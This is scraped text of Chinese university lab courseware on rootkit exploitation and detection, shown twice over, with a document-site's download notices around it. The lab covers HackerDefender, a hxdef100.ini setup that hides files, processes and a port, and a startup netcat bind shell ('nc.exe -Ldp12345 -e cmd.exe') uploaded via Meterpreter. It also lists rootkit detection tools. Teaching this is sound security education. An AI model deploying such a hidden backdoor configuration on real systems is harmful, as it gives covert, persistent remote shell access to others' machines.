网络空间安全技术实践教程(40)课件_第1页
网络空间安全技术实践教程(40)课件_第2页
网络空间安全技术实践教程(40)课件_第3页
网络空间安全技术实践教程(40)课件_第4页
网络空间安全技术实践教程(40)课件_第5页
已阅读5页,还剩29页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

网络空间安全技术实践教程吕秋云,王小军,胡耿然,汪云路,王秋华西安电子科技大学出版社网络空间安全技术实践教程吕秋云,王小军,胡耿然,汪云路,王秋第四篇渗透攻击测试实验篇第十五章漏洞利用实验15.3Rootkit利用与检测实验网络空间安全技术实践教程2第四篇渗透攻击测试实验篇网络空间安全技术实践教程215.3Rootkit利用与检测实验实验目的:

了解Rootkit的工作原理和功能,熟悉常见Rootkit以及Rootkit检测工具的使用。网络空间安全技术实践教程315.3Rootkit利用与检测实验实验目的:网络空间安全15.3Rootkit利用与检测实验实验原理:Rootkit通常是一组恶意计算机软件的集合,运行于操作系统的底层内核之中。Rootkit可以实现多种功能,完成比如隐藏文件、进程以及程序,提权,记录键盘,安装后门等恶意行的任务。网络空间安全技术实践教程415.3Rootkit利用与检测实验实验原理:网络空间安全15.3Rootkit利用与检测实验实验原理:

计算机系统中与用户进行交互的软件,通常其功能是在操作系统中较高层上实现的。当它们执行任务时,经常会向操作系统中较底层的服务发送请求,而Rootkit运行于系统底层,可以通过“挂钩”或拦截软件等工具拦截这些请求,并修改系统的正常响应,完成各种恶意目的。网络空间安全技术实践教程515.3Rootkit利用与检测实验实验原理:网络空间安全15.3Rootkit利用与检测实验实验要点说明:(实验难点说明)HackerDefender的配置及使用HackerDefender是一个WindowsRootkit,主要包含3个文件:hxdef100.exe、hxdef100.ini、bdcli100.exe。hxdef100.exe:在目标计算机上运行HackerDefenderbdcli100.exe:客户端软件,用于连接后门Hxdef100.exe:配置文件。配置隐藏的文件、文件夹、进程,配置自动运行的程序,配置连接后门的密码等信息。

网络空间安全技术实践教程615.3Rootkit利用与检测实验实验要点说明:(实验难15.3Rootkit利用与检测实验实验要点说明:(实验难点说明)HackerDefender的配置及使用

[HiddenTable]:要隐藏的文件、文件夹、进程,其中的所有条目对Windows资源管理器和文件管理器来说都是隐藏的。[RootProcesses]:用来与客户端交互的进程,通常是隐藏的。[HiddenServices]:要隐藏的服务,其中的所有服务都不会出现在服务列表中。[HiddenRegKeys]:要隐藏的注册表条目。[StartupRun]:系统每次启动时运行的程序。[HiddenPorts]:要隐藏的端口号。。

网络空间安全技术实践教程715.3Rootkit利用与检测实验实验要点说明:(实验难15.3Rootkit利用与检测实验实验要点说明:(实验难点说明)常见Rootkit检测工具的使用

网络空间安全技术实践教程815.3Rootkit利用与检测实验实验要点说明:(实验难15.3Rootkit利用与检测实验实验准备:(实验环境,实验先有知识技术说明)KaliLinuxHackerDefenderWindowsXP(靶机)网络空间安全技术实践教程915.3Rootkit利用与检测实验实验准备:(实验环15.3Rootkit利用与检测实验实验步骤:(1)配置hxdef100.ini文件,利用Meterpreter把Netcat,hxdef100.exe,hxdef100.ini上传到目标计算机。网络空间安全技术实践教程1015.3Rootkit利用与检测实验实验步骤:网络空间安全15.3Rootkit利用与检测实验实验步骤:(1)hxdef100.ini采取的配置如下(这里仅给出了修改的部分):网络空间安全技术实践教程11[HiddenTable]hxdef*rcmd.exerknc.exe

[RootProcesses]hxdef*rcmd.exenc.exe……[StartupRun]C:\rk\nc.exe?-Ldp12345-eC:\WINDOWS\system32\cmd.exe……[HiddenPorts]TCP:1234515.3Rootkit利用与检测实验实验步骤:网络空间安全15.3Rootkit利用与检测实验实验步骤:(2)用“execute–fhxdef100.exe”命令运行HackerDefender,运行后将会根据配置文件进行相关隐藏。网络空间安全技术实践教程12HackerDefender运行之前HackerDefender运行之后15.3Rootkit利用与检测实验实验步骤:网络空间安全15.3Rootkit利用与检测实验实验步骤:(3)与留下的后门进行交互。当hxdef100.exe在目标计算机运行后,会尝试在开放的端口上安装后门程序,供bdcli100.exe连接。这里假设目标计算机上的80端口开放,并且成功地被hxdef100.exe安装了后门程序,我们可以运行客户端程序bdcli00.exe连接该后门网络空间安全技术实践教程13bdcli100.exe连接后门15.3Rootkit利用与检测实验实验步骤:网络空间安全15.3Rootkit利用与检测实验实验步骤:(4)Rootkit的检测Rootkit的手工检测难度较大,需要深入理解操作系统工作原理,这里仅介绍一些常用的Rootkit检测工具:Windows平台:GMER,IceSword,RootkitRevealer,Blacklight等。Linux平台:RootkitHunter,Chkrootkit等。网络空间安全技术实践教程1415.3Rootkit利用与检测实验实验步骤:网络空间安全15.3Rootkit利用与检测实验实验要求:使用HackerDefender在Windows系统上留取Rootkit,并使用Rootkit检测工具进行分析和清除。网络空间安全技术实践教程1515.3Rootkit利用与检测实验实验要求:网络空间安全15.3Rootkit利用与检测实验实验扩展要求:学习Windows和Linux平台下常见的Rootkit软件及其使用。。网络空间安全技术实践教程1615.3Rootkit利用与检测实验实验扩展要求:网络空间15.3Rootkit利用与检测实验实验视频:网络空间安全技术实践教程1715.3Rootkit利用与检测实验实验视频:网络空间安全网络空间安全技术实践教程吕秋云,王小军,胡耿然,汪云路,王秋华西安电子科技大学出版社网络空间安全技术实践教程吕秋云,王小军,胡耿然,汪云路,王秋第四篇渗透攻击测试实验篇第十五章漏洞利用实验15.3Rootkit利用与检测实验网络空间安全技术实践教程19第四篇渗透攻击测试实验篇网络空间安全技术实践教程215.3Rootkit利用与检测实验实验目的:

了解Rootkit的工作原理和功能,熟悉常见Rootkit以及Rootkit检测工具的使用。网络空间安全技术实践教程2015.3Rootkit利用与检测实验实验目的:网络空间安全15.3Rootkit利用与检测实验实验原理:Rootkit通常是一组恶意计算机软件的集合,运行于操作系统的底层内核之中。Rootkit可以实现多种功能,完成比如隐藏文件、进程以及程序,提权,记录键盘,安装后门等恶意行的任务。网络空间安全技术实践教程2115.3Rootkit利用与检测实验实验原理:网络空间安全15.3Rootkit利用与检测实验实验原理:

计算机系统中与用户进行交互的软件,通常其功能是在操作系统中较高层上实现的。当它们执行任务时,经常会向操作系统中较底层的服务发送请求,而Rootkit运行于系统底层,可以通过“挂钩”或拦截软件等工具拦截这些请求,并修改系统的正常响应,完成各种恶意目的。网络空间安全技术实践教程2215.3Rootkit利用与检测实验实验原理:网络空间安全15.3Rootkit利用与检测实验实验要点说明:(实验难点说明)HackerDefender的配置及使用HackerDefender是一个WindowsRootkit,主要包含3个文件:hxdef100.exe、hxdef100.ini、bdcli100.exe。hxdef100.exe:在目标计算机上运行HackerDefenderbdcli100.exe:客户端软件,用于连接后门Hxdef100.exe:配置文件。配置隐藏的文件、文件夹、进程,配置自动运行的程序,配置连接后门的密码等信息。

网络空间安全技术实践教程2315.3Rootkit利用与检测实验实验要点说明:(实验难15.3Rootkit利用与检测实验实验要点说明:(实验难点说明)HackerDefender的配置及使用

[HiddenTable]:要隐藏的文件、文件夹、进程,其中的所有条目对Windows资源管理器和文件管理器来说都是隐藏的。[RootProcesses]:用来与客户端交互的进程,通常是隐藏的。[HiddenServices]:要隐藏的服务,其中的所有服务都不会出现在服务列表中。[HiddenRegKeys]:要隐藏的注册表条目。[StartupRun]:系统每次启动时运行的程序。[HiddenPorts]:要隐藏的端口号。。

网络空间安全技术实践教程2415.3Rootkit利用与检测实验实验要点说明:(实验难15.3Rootkit利用与检测实验实验要点说明:(实验难点说明)常见Rootkit检测工具的使用

网络空间安全技术实践教程2515.3Rootkit利用与检测实验实验要点说明:(实验难15.3Rootkit利用与检测实验实验准备:(实验环境,实验先有知识技术说明)KaliLinuxHackerDefenderWindowsXP(靶机)网络空间安全技术实践教程2615.3Rootkit利用与检测实验实验准备:(实验环15.3Rootkit利用与检测实验实验步骤:(1)配置hxdef100.ini文件,利用Meterpreter把Netcat,hxdef100.exe,hxdef100.ini上传到目标计算机。网络空间安全技术实践教程2715.3Rootkit利用与检测实验实验步骤:网络空间安全15.3Rootkit利用与检测实验实验步骤:(1)hxdef100.ini采取的配置如下(这里仅给出了修改的部分):网络空间安全技术实践教程28[HiddenTable]hxdef*rcmd.exerknc.exe

[RootProcesses]hxdef*rcmd.exenc.exe……[StartupRun]C:\rk\nc.exe?-Ldp12345-eC:\WINDOWS\system32\cmd.exe……[HiddenPorts]TCP:1234515.3Rootkit利用与检测实验实验步骤:网络空间安全15.3Rootkit利用与检测实验实验步骤:(2)用“execute–fhxdef100.exe”命令运行HackerDefender,运行后将会根据配置文件进行相关隐藏。网络空间安全技术实践教程29HackerDefender运行之前HackerDefender运行之后15.3Rootkit利用与检测实验实验步骤:网络空间安全15.3Rootkit利用与检测实验实验步骤:(3)与留下的后门进行交互。当hxdef100.exe在目标计算机运行后,会尝试在开放的端口上安装后门程序,供bdcli100.exe连接。这里假设目标计算机上的80端口开放,并且成功地被hxdef100.exe安装了后门程序,我们可以运行客户端程序bdcli00.exe连接该后门网络空间安全技术实践教程30bdcli100.exe连接后门15.3Ro

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论